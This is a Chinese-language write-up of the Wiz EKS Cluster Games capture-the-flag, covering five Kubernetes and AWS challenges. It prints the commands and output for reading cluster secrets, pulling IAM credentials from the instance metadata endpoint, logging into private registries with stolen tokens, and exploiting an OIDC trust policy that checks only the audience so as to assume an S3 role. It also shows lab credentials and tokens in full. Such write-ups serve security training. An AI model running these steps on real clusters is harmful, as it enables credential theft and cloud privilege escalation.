WIZ EKS Cluster Games
just for fun 23年的比赛了
challenge 1
kubectl config view
kubectl auth can-i --list
kubectl get secrets -n challenge1
kubectl get secrets log-rotate -n challenge1 -o yaml
challenge 2
kubectl auth can-i --list
题目要求关注注册表
root@wiz-eks-challenge:~# kubectl get pods database-pod-14f9769b -o yaml
apiVersion: v1
kind: Pod
metadata:
annotations:
pulumi.com/autonamed: "true"
creationTimestamp: "2025-08-13T10:48:59Z"
generation: 1
name: database-pod-14f9769b
namespace: challenge2
resourceVersion: "424581513"
uid: e1c6b56d-15d5-491d-9cc8-fa6d739b62c2
spec:
containers:
- image: eksclustergames/base_ext_image
imagePullPolicy: Always
name: my-container
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-8cw9p
readOnly: true
dnsPolicy: ClusterFirst
enableServiceLinks: true
imagePullSecrets:
- name: try-pull-secrets-16ae8e51
nodeName: ip-192-168-6-0.us-west-1.compute.internal
status:
conditions:
- lastProbeTime: null
lastTransitionTime: "2025-08-13T10:49:05Z"
status: "True"
type: PodReadyToStartContainers
- lastProbeTime: null
lastTransitionTime: "2025-08-13T10:48:59Z"
status: "True"
type: Initialized
- lastProbeTime: null
lastTransitionTime: "2026-04-24T07:25:14Z"
status: "True"
type: Ready
- lastProbeTime: null
lastTransitionTime: "2026-04-24T07:25:14Z"
status: "True"
type: ContainersReady
- lastProbeTime: null
lastTransitionTime: "2025-08-13T10:48:59Z"
status: "True"
type: PodScheduled
containerStatuses:
- containerID: containerd://6d6a987bea61fbc0a81d4465d4ea680ffc8c4156a2af7266ae24fb71c4a34ddc
image: docker.io/eksclustergames/base_ext_image:latest
imageID: docker.io/eksclustergames/base_ext_image@sha256:dc7972c9abff930285186786ba21cdf44a401e91ece2dddd4b487a6028fb3804看到有镜像,应该是私有注册表,需要鉴权后才能下载到这个image,获取secrets中的凭据,使用 crane 登录私有注册表
kubectl get secrets registry-pull-secrets-16ae8e51 -o yaml解码能看到地址
crane auth login -u eksclustergames -p dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo index.docker.io登录拉取然后解压
challenge 3
Image Inquisition
A pod's image holds more than just code. Dive deep into its ECR repository, inspect the image layers, and uncover the hidden secret.
提示注意镜像构建层
root@wiz-eks-challenge:~# kubectl get pods
NAME READY STATUS RESTARTS AGE
accounting-pod-acbd5209 1/1 Running 7 (18d ago) 272d
root@wiz-eks-challenge:~# kubectl get pods accounting-pod-acbd5209 -o yamlapiVersion: v1
kind: Pod
metadata:
annotations:
pulumi.com/autonamed: "true"
creationTimestamp: "2025-08-13T11:22:21Z"
generation: 1
name: accounting-pod-acbd5209
namespace: challenge3
resourceVersion: "424594578"
uid: ff755d4c-5581-4673-8e2f-5bd999882d5d
spec:
containers:
- image: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7@sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4
imagePullPolicy: IfNotPresent
name: accounting-container
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-n7q8h
readOnly: true
dnsPolicy: ClusterFirst
enableServiceLinks: true
nodeName: ip-192-168-63-122.us-west-1.compute.internal
terminationGracePeriodSeconds: 30
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: kube-api-access-n7q8h
projected:
defaultMode: 420
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
apiVersion: v1
fieldPath: metadata.namespace
path: namespace
containerStatuses:
- containerID: containerd://b4a826376fa782db87f927019584b3b37821d2c5bda93192b2f34a6074b92a48
image: sha256:c5e09ea1551a1976284b15c1d5e856cbda91b98e04a7e88f517a182f29b0c914
imageID: 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-579b0b7@sha256:78ed636b41e5158cc9cb3542fbd578ad7705ce4194048b2ec8783dd0299ef3c4没有权限下载,尝试获取一下云元数据
curl 169.254.169.254/latest/meta-data
有 iam 接口,可以获取到容器实例的角色的临时凭据
root@wiz-eks-challenge:~# curl 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole
{"AccessKeyId":"ASIA2AVYNEVM2Q4YQ3R5","Expiration":"2026-05-13 08:33:31+00:00","SecretAccessKey":"smYes6zDLDrxyjbnUPx/p2oAtfiCDZD0pR7G7+oy","SessionToken":"FwoGZXIvYXdzEIn//////////wEaDCBrc4fFO7sM+1HDJyK3AdOq6r9XhTUsJIElJ0bjBbeG6SZfr+7G7B+HJa1yvUsnXJYXLV7nuJ0Gf17oHT1iCfkFFggR5CLfj6XITGZh7G+ZuVZrNuU8dEhia22l3yTD+8fTXo6ZuglspSPW72N5kSf926bF/x7KHVqzDhiXn9eChqhD0p7jA2fgixqpeM4gHBQNSJK/zqcCidRph3b1/vjQzul66TwRjuwXzXn1qiKMFUjeSc6Uzf+Tu2HtJlI5Vrg+z8HQpyjL0pDQBjItEfY6GRTz2gg5C9oEEjSw9xE7fvEBQ8q/flb4e71m7edGgpNXtrNrai24lti4"}把这些 export 到 aws 的 cli 工具然后登录
aws ecr get-login-password|crane auth login 688655246681.dkr.ecr.us-west-1.amazonaws.com -u AWS --password-stdinroot@wiz-eks-challenge:~# crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01 | jq
{
"architecture": "amd64",
"config": {
"Env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
],
"Cmd": [
"/bin/sleep",
"3133337"
],
"ArgsEscaped": true,
"OnBuild": null
},
"created": "2023-11-01T13:32:07.782534085Z",
"history": [
{
"created": "2023-07-18T23:19:33.538571854Z",
"created_by": "/bin/sh -c #(nop) ADD file:7e9002edaafd4e4579b65c8f0aaabde1aeb7fd3f8d95579f7fd3443cef785fd1 in / "
},
{
"created": "2023-07-18T23:19:33.655005962Z",
"created_by": "/bin/sh -c #(nop) CMD [\"sh\"]",
"empty_layer": true
},
{
"created": "2023-11-01T13:32:07.782534085Z",
"created_by": "RUN sh -c #ARTIFACTORY_USERNAME=challenge@eksclustergames.com ARTIFACTORY_TOKEN=wiz_eks_challenge{the_history_of_container_images_could_reveal_the_secrets_to_the_future} ARTIFACTORY_REPO=base_repo /bin/sh -c pip install setuptools --index-url intrepo.eksclustergames.com # buildkit # buildkit",
"comment": "buildkit.dockerfile.v0"
},
{
"created": "2023-11-01T13:32:07.782534085Z",
"created_by": "CMD [\"/bin/sleep\" \"3133337\"]",
"comment": "buildkit.dockerfile.v0",
"empty_layer": true
}
],
"os": "linux",
"rootfs": {
"type": "layers",
"diff_ids": [
"sha256:3d24ee258efc3bfe4066a1a9fb83febf6dc0b1548dfe896161533668281c9f4f",
"sha256:9057b2e37673dc3d5c78e0c3c5c39d5d0a4cf5b47663a4f50f5c6d56d8fd6ad5"
]
}
}challenge 4
Pod Break
You're inside a vulnerable pod on an EKS cluster. Your pod's service-account has no permissions. Can you navigate your way to access the EKS Node's privileged service-account?
毫无权限
root@wiz-eks-challenge:~# aws sts get-caller-identity
{
"UserId": "AROA2AVYNEVMQ3Z5GHZHS:i-0bd90a7fe60cdb9f7",
"Account": "688655246681",
"Arn": "arn:aws:sts::688655246681:assumed-role/eks-challenge-cluster-nodegroup-NodeInstanceRole/i-0bd90a7fe60cdb9f7"
}获取 token
kubectl auth can-i --list --token="k8s-aws-v1.aHR0cHM6Ly9zdHMudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20vP0FjdGlvbj1HZXRDYWxsZXJJZGVudGl0eSZWZXJzaW9uPTIwMTEtMDYtMTUmWC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BU0lBMkFWWU5FVk02UUFPVEc1NCUyRjIwMjYwNTE0JTJGdXMtd2VzdC0xJTJGc3RzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNjA1MTRUMTExMTUwWiZYLUFtei1FeHBpcmVzPTYwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCUzQngtazhzLWF3cy1pZCZYLUFtei1TZWN1cml0eS1Ub2tlbj1Gd29HWlhJdllYZHpFS1glMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkZ3RWFERWpIQWdYcmlHYzhUY003U2lLM0FhNTN5R3JEcXE0Y3A1YllzaWlFcUFRVng4ZlZJM2JMRFpOJTJGUEtXSE4lMkZEM1BNUm1JVWZLdUZJJTJGaGVxMUlZazhPeE5rWnMxZyUyRnBXZCUyQk1HRlJGeCUyQkdLcndqcFpVaUt5TFVaJTJGTHlkbSUyRncxVEZOTVNiYUJEWjU3Q0k0cFVKeXM0Tm9kNkJmTWRQcXdqTnM0MU85c0pMR2V1dGc1bE1hQktZVlltb1plaXBiWVdnV2RYN2lZcjdiVDJNWWpVS1pUSlJwb00wR0d2aFhBcHZXJTJGT1JiMmVGQ1E3MVZoWnJYTE1VMCUyRlh2NHRzMGJBZEIzZ0pISG1ma3dTaWIyNWJRQmpJdFpFNndib0FTZ05VV01HdWRxZ0lMRlR4ZjglMkJVc1dkOGNubkdFN3FzeU5JR3pjaFI2cSUyRkVWSnJwenFzRkcmWC1BbXotU2lnbmF0dXJlPTUyMDg4MGVlNDYwZWI5ZWQ1M2FiMDMzNGNkNzMyMWJlMjRlNTIzMWU5NTQxZDYxMzc1NWVmZTQyOGNmYjY5YmU"
发现有 list 权限
kubectl get secrets -o yaml --token="k8s-aws-v1.aHR0cHM6Ly9zdHMudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20vP0FjdGlvbj1HZXRDYWxsZXJJZGVudGl0eSZWZXJzaW9uPTIwMTEtMDYtMTUmWC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BU0lBMkFWWU5FVk02UUFPVEc1NCUyRjIwMjYwNTE0JTJGdXMtd2VzdC0xJTJGc3RzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNjA1MTRUMTExMTUwWiZYLUFtei1FeHBpcmVzPTYwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCUzQngtazhzLWF3cy1pZCZYLUFtei1TZWN1cml0eS1Ub2tlbj1Gd29HWlhJdllYZHpFS1glMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkYlMkZ3RWFERWpIQWdYcmlHYzhUY003U2lLM0FhNTN5R3JEcXE0Y3A1YllzaWlFcUFRVng4ZlZJM2JMRFpOJTJGUEtXSE4lMkZEM1BNUm1JVWZLdUZJJTJGaGVxMUlZazhPeE5rWnMxZyUyRnBXZCUyQk1HRlJGeCUyQkdLcndqcFpVaUt5TFVaJTJGTHlkbSUyRncxVEZOTVNiYUJEWjU3Q0k0cFVKeXM0Tm9kNkJmTWRQcXdqTnM0MU85c0pMR2V1dGc1bE1hQktZVlltb1plaXBiWVdnV2RYN2lZcjdiVDJNWWpVS1pUSlJwb00wR0d2aFhBcHZXJTJGT1JiMmVGQ1E3MVZoWnJYTE1VMCUyRlh2NHRzMGJBZEIzZ0pISG1ma3dTaWIyNWJRQmpJdFpFNndib0FTZ05VV01HdWRxZ0lMRlR4ZjglMkJVc1dkOGNubkdFN3FzeU5JR3pjaFI2cSUyRkVWSnJwenFzRkcmWC1BbXotU2lnbmF0dXJlPTUyMDg4MGVlNDYwZWI5ZWQ1M2FiMDMzNGNkNzMyMWJlMjRlNTIzMWU5NTQxZDYxMzc1NWVmZTQyOGNmYjY5YmU"
challenge 5
看一下权限
root@wiz-eks-challenge:~# kubectl auth can-i --list
warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
serviceaccounts/token [] [debug-sa] [create]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
secrets [] [] [get list]
serviceaccounts [] [] [get list]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
podsecuritypolicies.policy [] [eks.privileged] [use]策略如下
IAM Policy
{
"Policy": {
"Statement": [
{
"Action": [
"s3:GetObject",
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": [
"arn:aws:s3:::challenge-flag-bucket-3ff1ae2",
"arn:aws:s3:::challenge-flag-bucket-3ff1ae2/flag"
]
}
],
"Version": "2012-10-17"
}
}
Trust Policy
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
}
}
}
]
}
EKS权限
{
"secrets": [
"get",
"list"
],
"serviceaccounts": [
"get",
"list"
],
"pods": [
"get",
"list"
],
"serviceaccounts/token": [
"create"
]
}查看服务账号的详细信息
root@wiz-eks-challenge:~# kubectl get sa
NAME SECRETS AGE
debug-sa 0 2y194d
default 0 2y194d
s3access-sa 0 2y194d
root@wiz-eks-challenge:~# kubectl get sa debug-sa -o yaml
apiVersion: v1
kind: ServiceAccount
metadata:
annotations:
description: This is a dummy service account with empty policy attached
eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeTestRole-fc9d18e
creationTimestamp: "2023-10-31T20:07:37Z"
name: debug-sa
namespace: challenge5
resourceVersion: "671929"
uid: 6cb6024a-c4da-47a9-9050-59c8c7079904
root@wiz-eks-challenge:~# kubectl get sa default -o yaml
apiVersion: v1
kind: ServiceAccount
metadata:
creationTimestamp: "2023-10-31T20:07:11Z"
name: default
namespace: challenge5
resourceVersion: "671804"
uid: 77bd3db6-3642-40d5-b8c1-14fa1b0cba8c
root@wiz-eks-challenge:~# kubectl get sa s3access-sa -o yaml
apiVersion: v1
kind: ServiceAccount
metadata:
annotations:
eks.amazonaws.com/role-arn: arn:aws:iam::688655246681:role/challengeEksS3Role
creationTimestamp: "2023-10-31T20:07:34Z"
name: s3access-sa
namespace: challenge5
resourceVersion: "671916"
uid: 86e44c49-b05a-4ebe-800b-45183a6ebbdadebug-sa和s3access-sa两个 sa 中该字段有展示两个角色的 ARN,结合题目描述,要我们从 EKS 权限到 AWS 权限,这两者使用OIDC进行身份验证从而关联起来,猜测challengeEksS3Role这个角色应该需要扮演
注意到信任策略中,存在一个漏洞,OIDC进行身份验证只校验了audience受众字段,并没有限制令牌的主体,所以我们可以申请debug-sa的令牌
kubectl create token debug-sa --audience sts.amazonaws.com然后获取凭证
aws sts assume-role-with-web-identity --role-arn arn:aws:iam::688655246681:role/challengeEksS3Role --role-session-name testsessionname --web-identity-token
eyJhbGciOiJSUzI1NiIsImtpZCI6ImVmMWI3NmMxNjY2ZDIxZjdiZjVlYTk1M2E4NmY1ODBjYzk1NmQ3YTQifQ.eyJhdWQiOlsic3RzLmFtYXpvbmF3cy5jb20iXSwiZXhwIjoxNzc4NzQ4OTQ4LCJpYXQiOjE3Nzg3NDUzNDgsImlzcyI6Imh0dHBzOi8vb2lkYy5la3MudXMtd2VzdC0xLmFtYXpvbmF3cy5jb20vaWQvQzA2MkMyMDdDOEY1MERFNEVDMjRBMzcyRkY2MEU1ODkiLCJqdGkiOiIyNWIyNmM0Ni03ZjZhLTQzYjgtYmU0OS1mMmI3M2I0MjRlMjkiLCJrdWJlcm5ldGVzLmlvIjp7Im5hbWVzcGFjZSI6ImNoYWxsZW5nZTUiLCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVidWctc2EiLCJ1aWQiOiI2Y2I2MDI0YS1jNGRhLTQ3YTktOTA1MC01OWM4YzcwNzk5MDQifX0sIm5iZiI6MTc3ODc0NTM0OCwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmNoYWxsZW5nZTU6ZGVidWctc2EifQ.LrpGXlfkrPg8kCq0_E96S4V4irSZb_T5_CBj_JrRS6ifdR65fwjaPJAFTPgPF_zdnTQqAPN3LwjvX0R9zCqCkiZrfE8ZeJ287dJX9Vxil5QwO_knZRZ1ppRbIVJlQpcKgX3TsalyjiHa9uo6JX-TEayRpu11XK-0Q5QSe_ZJwowYajBO5xWCkL5r78WskQL2mXeXUo80CPNNWliKJG7TeNq5phavg90SJO22MHZ6ryKunfnV2RMrB8v6ikVtitSqsrihNIzUndFItbn0Xuge7mova2GsbTlwqgQU13dcTjmL-85w9RtkYRakXhb0IVhf6x_PKB3XXgKP1pl3k7guWQ
{
"Credentials": {
"AccessKeyId": "ASIA2AVYNEVM47ZCVUTK",
"SecretAccessKey": "bRy3puw8fm6DNLXMF14HjgSGHyl/fu0B6OBAufFf",
"SessionToken": "IQoJb3JpZ2luX2VjEJD//////////wEaCXVzLXdlc3QtMSJGMEQCIFXP9A0kdwUIZEydzk4QoGUY1wnytI73pwaaNBVucqdFAiAD/NDf0lBlLkMm3WzH+oqa7EzxpqgMbJ9e1IuxBU0kqirCBAhZEAEaDDY4ODY1NTI0NjY4MSIMOxUfsXrghg3AT/lvKp8EtImYi1w/E0b19za9rWXrbtzNHAOgbaNXVMy+JGCthbPfDIKPKymNPZhqG4QKrU9vsGScxQem5/Yl1arjd2ZuHppCzRqT5Uu5f5j6fjyc4tJIq65TvVk9fAHIME7eu1oEIasG3MdvolFpNIpZN4APIMLnXqY59DUrTy6rCUcua+g6sWnRbZ33hL+JyAXoRLxWl3uDZEcvz8LKDQLpelS8FQHvkXmG6QLqGal/J+dHFfeCyZJmM/CTUS9Gyk3/L7/u8j+qFLBg6o7spERICus+hJyYjt29GnRBI0Qzi9fYiZoKDIGGHa3CTqRaN2mNx7R/bjfdKz0yxQPEMqBsbf5RZZIRYGBDRrgDQxiZQN+3lUUJiDtLEksfwJmNF0vuMJl7bvcyiBLQ4p3yZdkEpU1N4MpgK8DxCIx3Zi7EFTor9i3p2QEueWLM84X2KLp+SbZbtsLheBLTFSBteXXyR5z7/Yr/o9Rnh4L/sxRDJvkC/K+j5lVgO0gc6bTkbh/y0JSJqz9K3yEOZe9QHGEjgIX6O/9iTvGqdkdRNI97cAMm0zMd2bo+XjEIqA0OjRTaPbAZzvvSmBCFj4+Dvcyr0xvPmPkiXX1Db2VEbRXm7BoUuhXBe4Sqh8yMblLbfW6OIcFG9ezdDTiaoQr8XnUi2PU0WTao8TPyr1vCIDkYhn86YEJpejzNlJiCsGOqCzOx/mEowsQhhQ8QIYKp9ikwV25SMMaAltAGOpQBCUw2kaM/oolHWISzU8LtffwuxAmuKhzKgYRgujS0Y7/FRzaaBlZhmIcRikTYxEOCSWb4/G/f8IaXg/oQmciJtyszzwUOEIFghHWukUhGhX5drgs7Q6+QVw5697zhaxRyHT2sY+hDtRXRxQ6aKmjy5OOqeb3LB/V+8qqOpGeOqb8uDepwfsLEhjzMWMJEb+kIwfJkWg==",
"Expiration": "2026-05-14T08:56:54+00:00"
},
"SubjectFromWebIdentityToken": "system:serviceaccount:challenge5:debug-sa",
"AssumedRoleUser": {
"AssumedRoleId": "AROA2AVYNEVMZEZ2AFVYI:testsessionname",
"Arn": "arn:aws:sts::688655246681:assumed-role/challengeEksS3Role/testsessionname"
},
"Provider": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589",
"Audience": "sts.amazonaws.com"
}最后 download 下来
root@wiz-eks-challenge:~# aws s3 ls s3://challenge-flag-bucket-3ff1ae2/
2023-11-01 12:27:55 72 flag
root@wiz-eks-challenge:~# aws s3 cp s3://challenge-flag-bucket-3ff1ae2/flag flag
download: s3://challenge-flag-bucket-3ff1ae2/flag to ./flag
root@wiz-eks-challenge:~# cat flag
wiz_eks_challenge{w0w_y0u_really_are_4n_eks_and_aws_exp1oitation_legend}